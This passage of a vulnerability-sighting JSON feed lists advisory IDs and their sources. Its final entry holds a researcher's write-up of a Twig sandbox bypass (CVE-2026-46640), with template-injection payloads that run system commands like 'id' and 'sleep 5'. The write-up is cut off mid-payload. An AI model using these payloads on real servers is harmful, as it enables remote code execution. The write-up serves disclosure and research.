"vulnerability": "GHSA-fm8p-53ww-hf6w", "type": "seen", "source": "https://gist.github.com/alon710/578cc93d0032ecb85c4eb5d7e0d82616", "content": "", "creation_timestamp": "2026-09-25T13:30:32.000000Z"}, {"uuid": "ea55cdd7-97ea-4c71-92e2-f86f148b3177", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VHM9-85GW-X335", "type": "published-proof-of-concept", "source": "Telegram/_vYx5PfUbcVNyQqU1JMebKoUfxBECmDURJ_i-7wEklwQ5pw", "content": "", "creation_timestamp": "2026-09-25T09:23:24.000000Z"}, {"uuid": "73c43942-e26c-44d2-a85c-42990ef0c836", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cjx3-73hr-rpw7", "type": "seen", "source": "https://gist.github.com/alon710/3908807e8c617e39340726cbf7670bd2", "content": "", "creation_timestamp": "2026-09-25T14:30:32.000000Z"}, {"uuid": "72e15bc2-c815-4066-99e1-3d81e8530c78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5C9J-MHMV-5XGX", "type": "seen", "source": "https://t.me/bdufstecru/3482", "content": "", "creation_timestamp": "2026-09-25T13:57:03.000000Z"}, {"uuid": "567e9dca-6fec-4a1f-b28e-dc7adc4f45f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j8r4-32c5-33rc", "type": "seen", "source": "https://gist.github.com/alon710/f611d72b281b196826650e03968e5bde", "content": "", "creation_timestamp": "2026-09-25T15:30:32.000000Z"}, {"uuid": "6edadbb2-a8a1-4aaf-9862-db71cf852fea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5C9J-MHMV-5XGX", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3482", "content": "", "creation_timestamp": "2026-09-25T13:57:03.000000Z"}, {"uuid": "45cd3d27-6928-4d3f-8056-430dd5c8d0c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7vj-c29h-3h5m", "type": "seen", "source": "https://gist.github.com/alon710/ce948372dcaedff5ad40dfc5f894ab79", "content": "", "creation_timestamp": "2026-09-25T16:30:32.000000Z"}, {"uuid": "de55966b-412a-435f-a02e-19ea3cf281f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v65j-hff3-753c", "type": "seen", "source": "https://gist.github.com/alon710/43cc054a1c1ef89b52a71a555d759fdb", "content": "", "creation_timestamp": "2026-09-25T17:30:28.000000Z"}, {"uuid": "835ab33b-e5de-4267-aebb-d6f63cc4817f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v65j-hff3-753c", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mweflkzzvv2x", "content": "", "creation_timestamp": "2026-09-25T18:28:47.889304Z"}, {"uuid": "6fc10aee-abd4-4ff4-b2a3-2ca2f84de3c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qxg3-46rw-79j8", "type": "seen", "source": "https://gist.github.com/alon710/4cf0072fd72e5b7220c9b813b7fb1aa2", "content": "", "creation_timestamp": "2026-09-25T18:30:32.000000Z"}, {"uuid": "b68f1658-d102-457b-a32f-91e7675ae1d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vj3q-vp3g-j9c8", "type": "seen", "source": "https://gist.github.com/alon710/81ebeb26ef49d3bdcb489d52174596c0", "content": "", "creation_timestamp": "2026-09-25T19:30:32.000000Z"}, {"uuid": "60c8276d-87ad-4f22-ae54-6f5d6deef482", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9gfj-28hw-jchp", "type": "seen", "source": "https://gist.github.com/alon710/723cd5cd84efce7d1b7fc9c58a25b858", "content": "", "creation_timestamp": "2026-09-25T20:30:32.000000Z"}, {"uuid": "61381470-b743-4bf6-beb6-e21b1f393f4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73j8-2gch-69rq", "type": "seen", "source": "https://gist.github.com/konard/57bcae13cb8638ec6b14c7799d07914c", "content": "", "creation_timestamp": "2026-09-25T20:22:47.000000Z"}, {"uuid": "e9057f84-aa31-4d34-99fa-252624f3c979", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mh99-v99m-4gvg", "type": "seen", "source": "https://gist.github.com/konard/57bcae13cb8638ec6b14c7799d07914c", "content": "", "creation_timestamp": "2026-09-25T20:22:47.000000Z"}, {"uuid": "3da0bdff-c89e-4356-830c-a6dd6b25626d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HP8-65CH-5WHP", "type": "published-proof-of-concept", "source": "Telegram/hn_cbtJg35y3a8ky1wWtlHg_HSsW2-9wCiZ6CQmYLspAD7Q", "content": "", "creation_timestamp": "2026-09-24T11:27:23.000000Z"}, {"uuid": "f2c335e1-12ab-468e-a98c-0e35e710cc55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HP8-65CH-5WHP", "type": "published-proof-of-concept", "source": "Telegram/vqsPZgWgWmhUgO5aL_wpY6AtnbvKlpjOuzz_MF4q41HEYi4", "content": "", "creation_timestamp": "2026-09-23T15:00:06.000000Z"}, {"uuid": "27357a4d-c960-4934-b37c-c070f6d17389", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-29H2-JR22-FRMH", "type": "seen", "source": "https://gist.github.com/alon710/91368018d6f66ee7f4ed035c84f84a55", "content": "", "creation_timestamp": "2026-09-25T21:30:32.000000Z"}, {"uuid": "a26f52ec-d23f-481d-b5b6-6ca73b10eb67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q986-4x7x-gx39", "type": "seen", "source": "https://gist.github.com/alon710/770bc93a95283bd19ea1ae1345262edc", "content": "", "creation_timestamp": "2026-09-25T22:30:32.000000Z"}, {"uuid": "71a678ff-c86d-4b34-bf19-6cad1ff2aa4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c2f5-jxjv-2hh8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113432431807385293", "content": "", "creation_timestamp": "2024-11-05T21:19:10.403858Z"}, {"uuid": "2eb21996-b328-4aaf-8b8b-9e5fafff61ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hxf5-99xg-86hw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113432631517028864", "content": "", "creation_timestamp": "2024-11-05T22:09:57.663865Z"}, {"uuid": "77084be3-b072-4ddb-a1cf-8885ea7e2a4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f3f8-vx3w-hp5q", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113436505503276876", "content": "", "creation_timestamp": "2024-11-06T14:35:09.876692Z"}, {"uuid": "27436857-00c2-4d34-b88f-a053d830777f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fpm5-2wcj-vfr7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113436539799808263", "content": "", "creation_timestamp": "2024-11-06T14:43:53.151514Z"}, {"uuid": "118d9183-0686-4941-8002-3302c1663499", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2022:8506", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113436599869560909", "content": "", "creation_timestamp": "2024-11-06T14:59:09.825451Z"}, {"uuid": "a7442ceb-7c8b-459b-adee-fdff8d7183b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhm9-gp5p-5248", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113437611656088263", "content": "", "creation_timestamp": "2024-11-06T19:16:28.524689Z"}, {"uuid": "747e39cb-5017-4c43-b725-3fc530bf3a8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pj33-75x5-32j4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113437611670981901", "content": "", "creation_timestamp": "2024-11-06T19:16:28.837387Z"}, {"uuid": "9baaeb91-39c5-47f2-95ab-e6031dd3e727", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-96g7-g7g9-jxw8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113437649894636258", "content": "", "creation_timestamp": "2024-11-06T19:26:15.897244Z"}, {"uuid": "09a121a6-2f8e-489d-8c77-fbe4b7b48038", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6377-hfv9-hqf6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113437679723817793", "content": "", "creation_timestamp": "2024-11-06T19:33:59.913508Z"}, {"uuid": "a2ce0ffa-953c-4444-b90f-bfc56c1d7b4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjxq-ff2g-95vh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113437679739274661", "content": "", "creation_timestamp": "2024-11-06T19:34:00.143766Z"}, {"uuid": "8c0558f1-c725-4c7d-b364-23bec3309aaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qq5c-677p-737q", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113437993660081025", "content": "", "creation_timestamp": "2024-11-06T20:53:37.361290Z"}, {"uuid": "c9ad7f6e-df35-4878-8a33-9e320b73929f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mrqx-rp3w-jpjp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113438023541075562", "content": "", "creation_timestamp": "2024-11-06T21:01:13.452853Z"}, {"uuid": "9be1ea50-f345-4ca7-8ddc-4fe378d45f9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x8vp-gf4q-mw5j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113438061792761841", "content": "", "creation_timestamp": "2024-11-06T21:10:56.969744Z"}, {"uuid": "9c78fa7e-c49e-4df2-8836-6655f94af717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jxgr-3v7q-3w9v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113438061807610898", "content": "", "creation_timestamp": "2024-11-06T21:10:57.141395Z"}, {"uuid": "ed15ab5d-6db1-4e63-89d3-4529c23433dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9c3x-r3wp-mgxm", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113438061821670222", "content": "", "creation_timestamp": "2024-11-06T21:10:57.424294Z"}, {"uuid": "daa9ab17-fe7c-43f8-a42a-5d22ce05212d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g3rh-rrhp-jhh9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113438120822129921", "content": "", "creation_timestamp": "2024-11-06T21:25:57.714827Z"}, {"uuid": "9878ac47-9fd3-43e5-8fe2-a5747ca1b89e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88h5-6w7m-5w56", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113438853912158188", "content": "", "creation_timestamp": "2024-11-07T00:32:24.606007Z"}, {"uuid": "230f85be-d438-4e9b-bd71-2db5b8fe3c37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xj7w-r753-vj8v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113475925311367276", "content": "", "creation_timestamp": "2024-11-13T13:40:08.646436Z"}, {"uuid": "714fa155-3769-430b-a41a-4ecf1e7fd4ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xhjw-7vh5-qxqm", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113465940893352359", "content": "", "creation_timestamp": "2024-11-11T19:20:58.374206Z"}, {"uuid": "836c6722-2e13-45e6-b724-d35254d9d28a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cm46-gqf4-mv4f", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113465940862819309", "content": "", "creation_timestamp": "2024-11-11T19:20:58.039258Z"}, {"uuid": "b4a47f60-26e4-4e07-afc3-b21d4830485f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9j55-gvf2-cqwv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113465940877149481", "content": "", "creation_timestamp": "2024-11-11T19:20:58.259755Z"}, {"uuid": "ff90e250-0197-464b-b506-858833c3b160", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5rmx-fjmc-mg6x", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113466030355098961", "content": "", "creation_timestamp": "2024-11-11T19:43:44.449542Z"}, {"uuid": "66e2a84d-b287-4c57-be89-13c7abe3e0ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4q69-983r-mwwr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113466030382431535", "content": "", "creation_timestamp": "2024-11-11T19:43:44.704748Z"}, {"uuid": "6cf5718b-dd56-4020-a231-dd5527784dbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-46m4-5pxj-66f2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113466030368936843", "content": "", "creation_timestamp": "2024-11-11T19:43:44.640395Z"}, {"uuid": "66b30c5b-8ba6-4e93-a095-5d3183ec2264", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9qc-9m5h-qqmh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113510344782839735", "content": "", "creation_timestamp": "2024-11-19T15:33:28.412865Z"}, {"uuid": "f56be059-92b1-4fad-bed5-1db74d5005a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p24m-863f-fm6q", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113517271415805462", "content": "", "creation_timestamp": "2024-11-20T20:55:00.550393Z"}, {"uuid": "d36ab3fa-d416-4d11-b24d-87becbfea60e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p7f6-8mcm-fwv3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113513548675297287", "content": "", "creation_timestamp": "2024-11-20T05:08:15.640507Z"}, {"uuid": "7dd910f1-ed88-474b-9070-f3d2db8547bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q5p4-6q4v-gqg3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113515677629085542", "content": "", "creation_timestamp": "2024-11-20T14:09:40.741835Z"}, {"uuid": "6ab166cc-ff48-46d6-940d-543048f8177d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8hwq-5f22-jfr3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113481105542747243", "content": "", "creation_timestamp": "2024-11-14T11:37:32.730593Z"}, {"uuid": "3e72bfea-eef8-4386-8e1e-e12781ed530d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q76q-q8hw-hmpw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113481135941683844", "content": "", "creation_timestamp": "2024-11-14T11:45:16.351654Z"}, {"uuid": "87fdf2bf-f9a1-49b1-8791-5aa80294f8f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3wpx-625q-22j7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113481135941683844", "content": "", "creation_timestamp": "2024-11-14T11:45:16.374972Z"}, {"uuid": "d1970f81-77ce-48fb-a26f-e828f1c5c707", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xx9w-464f-7h6f", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113481166368149680", "content": "", "creation_timestamp": "2024-11-14T11:53:00.750723Z"}, {"uuid": "f37440bf-e135-4a53-8eaf-26045da2db99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8c6p-v837-77f6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113481166382753625", "content": "", "creation_timestamp": "2024-11-14T11:53:01.007835Z"}, {"uuid": "d7eeab42-b8c1-476e-88f3-2e5781c7b4ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3637-v6vq-xqqw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113481166398658446", "content": "", "creation_timestamp": "2024-11-14T11:53:01.393676Z"}, {"uuid": "7152ee79-9079-4375-ad7f-637518b4919a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhcq-44g3-5xcx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113482015467624579", "content": "", "creation_timestamp": "2024-11-14T15:28:56.958923Z"}, {"uuid": "d41b44f2-b4db-436d-b746-8027ab9ba81e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j6vm-4r7g-x4gr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113555421995502917", "content": "", "creation_timestamp": "2024-11-27T14:37:11.782191Z"}, {"uuid": "93256d94-5e72-488e-8b63-55286058ff49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gpf4-vrrw-r8v7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113606727044472926", "content": "", "creation_timestamp": "2024-12-06T16:04:44.685378Z"}, {"uuid": "175d3c2b-ef47-49b8-b64b-cc4c87d32ab9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9rmp-2568-59rv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113600938630184237", "content": "", "creation_timestamp": "2024-12-05T15:32:40.492482Z"}, {"uuid": "65cc35d6-cdda-4713-92b3-acf1687861b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q9rr-h3hx-m87g", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113556417023556349", "content": "", "creation_timestamp": "2024-11-27T18:50:14.541258Z"}, {"uuid": "d91287a0-530a-4046-9bf2-bfb954bfa18b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9r9m-ffp6-9x4v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113567706103109724", "content": "", "creation_timestamp": "2024-11-29T18:41:12.725092Z"}, {"uuid": "9a73264c-7268-4957-b86f-1d33286256a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4grw-m28r-q285", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113600997627813394", "content": "", "creation_timestamp": "2024-12-05T15:47:40.837895Z"}, {"uuid": "5ebb6aa9-1be7-4405-be34-446de6f6200d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r3gq-96h6-3v7q", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113606809513943170", "content": "", "creation_timestamp": "2024-12-06T16:25:42.929433Z"}, {"uuid": "8ffa482d-df31-4a70-8c16-9fc71b615cef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mj5r-x73q-fjw6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113557116159617169", "content": "", "creation_timestamp": "2024-11-27T21:48:02.559377Z"}, {"uuid": "52bbc772-b521-4ae5-8ae4-208b6cefe990", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xg58-75qf-9r67", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113545092265515508", "content": "", "creation_timestamp": "2024-11-25T18:50:12.518712Z"}, {"uuid": "a1609993-4190-486a-af41-79a69ac30c52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gmv-gf46-r4g5", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113545122233349276", "content": "", "creation_timestamp": "2024-11-25T18:57:50.173176Z"}, {"uuid": "71e4c871-1c25-4583-8036-1ce0f8827854", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-45vw-wh46-2vx8", "type": "seen", "source": "https://gist.github.com/vladko312/39507beaa58eacf3b62e6a6e6cd69128", "content": "# CVE-2026-46640 writeup\n\n![Report version](https://img.shields.io/badge/Report_version-1.0-purple)\n![Last modified](https://img.shields.io/badge/Last_modified-06.06.2026-purple)\n![CVE-2026-46640](https://img.shields.io/badge/CVE--2026--46640-8.7-orange)\n[![SSTImap module](https://img.shields.io/badge/SSTImap_module-extras/CVE--2026--46640-blue)](https://github.com/vladko312/extras)\n\nI recently learned about multiple sandbox bypasses discovered in Twig by project Glasswing.\nFrom the descriptions, only [CVE-2026-46640](https://github.com/advisories/GHSA-45vw-wh46-2vx8) and [CVE-2026-46633](https://github.com/advisories/GHSA-7p85-w9px-jpjp) seemed universally exploitable, so I decoded to research them.\nThis writeup documents my development of payloads for the CVE-2026-46640 and the corresponding [SSTImap](https://github.com/vladko312/sstimap) module.\n\n- [Initial observations](#initial-observations)\n- [Compiled template analysis](#compiled-template-analysis)\n- [First payload](#first-payload): base for **Error-Based** and **Time-Based Blind** payloads\n- [Second payload](#second-payload): base for **Rendered** and **Boolean Error-Based Blind** payloads\n- [SSTImap module](#sstimap-module)\n- [Note on CVE-2026-46633](#note-on-cve-2026-46633)\n\n## Initial observations\n\nFrom the descriptions, both CVE-2026-46640 and CVE-2026-46633 seemed deceptively simple.\nI decided to focus on CVE-2026-46640 first, as it did not seem to involve any escaping.\n\nSimply trying to recreate the payload from the description allowed me to confirm the presence of code injection using syntax errors:\n\n```php\n{{_self.(\" test \")}}\n```\n\nI discovered a way to avoid a syntax error, but got no code execution and the same error as for a regular text string:\n\n```php\n{{_self.(\" ;system('sleep 5');// \")}}\n```\n\nIt seems like this error occurs before the injected code is reached.\nI decided to check the generated code to better understand the injection context.\n\n## Compiled template analysis\n\n```php\n\n     */\n    private array $macros = [];\n\n    public function __construct(Environment $env)\n    {\n        parent::__construct($env);\n\n        $this-&gt;source = $this-&gt;getSourceContext();\n\n        $this-&gt;parent = false;\n\n        $this-&gt;blocks = [\n        ];\n    }\n\n    protected function doDisplay(array $context, array $blocks = []): iterable\n    {\n        $macros = $this-&gt;macros;\n        // line 1\n        yield $this-&gt;getTemplateForMacro(\"macro_ ;system('sleep 5');// \", $context, 1, $this-&gt;getSourceContext())-&gt;macro_ ;system('sleep 5');// (...[]);\n        yield from [];\n    }\n\n    /**\n     * @codeCoverageIgnore\n     */\n    public function getTemplateName(): string\n    {\n        return \"tpl\";\n    }\n\n    /**\n     * @codeCoverageIgnore\n     */\n    public function isTraitable(): bool\n    {\n        return false;\n    }\n\n    /**\n     * @codeCoverageIgnore\n     */\n    public function getDebugInfo(): array\n    {\n        return array (  42 =&gt; 1,);\n    }\n\n    public function getSourceContext(): Source\n    {\n        return new Source(\"\", \"tpl\", \"\");\n    }\n}\n```\n\nAs you might notice, the only two places, where the payload is used, are in the same line of code inside `doDisplay` function:\n\n```php\nyield $this-&gt;getTemplateForMacro(\"macro_ ;system('sleep 5');// \", $context, 1, $this-&gt;getSourceContext())-&gt;macro_ ;system('sleep 5');// (...[]);\n```\n\nThe first time, our payload is correctly escaped inside the string, but the second injection point allows arbitrary code.\nThe injected code is not executed, since `getTemplateForMacro` right before it causes a fatal error.\n\n## First payload\n\nSince our code inside `doDisplay` will never be reached, we need to escape the context of that function and inject the code there.\nFully escaping the class definition would be possible, but it would make the payload very long.\n\nAs a result, I decided to try injecting a function inside the generated class.\nThe part after the injection contains `yield`, turning that function into a generator.\nSince a lot of useful overridable functions can't be generators, I added an unused second function.\n\nFor a simple payload I decided to use `__destruct()`, as the object will be destroyed after the error:\n\n```php\n{{_self.(\";}function __destruct(){system('id');}function a(){//\")}}\n```\n\nThis payload worked and printed the command output after the error message.\nSince PHP allows changing error visibility inside dhe code, I made a proper **Error-Based** payload:\n\n```php\n{{_self.(\";}function __destruct(){error_reporting(1);ini_set('display_errors', 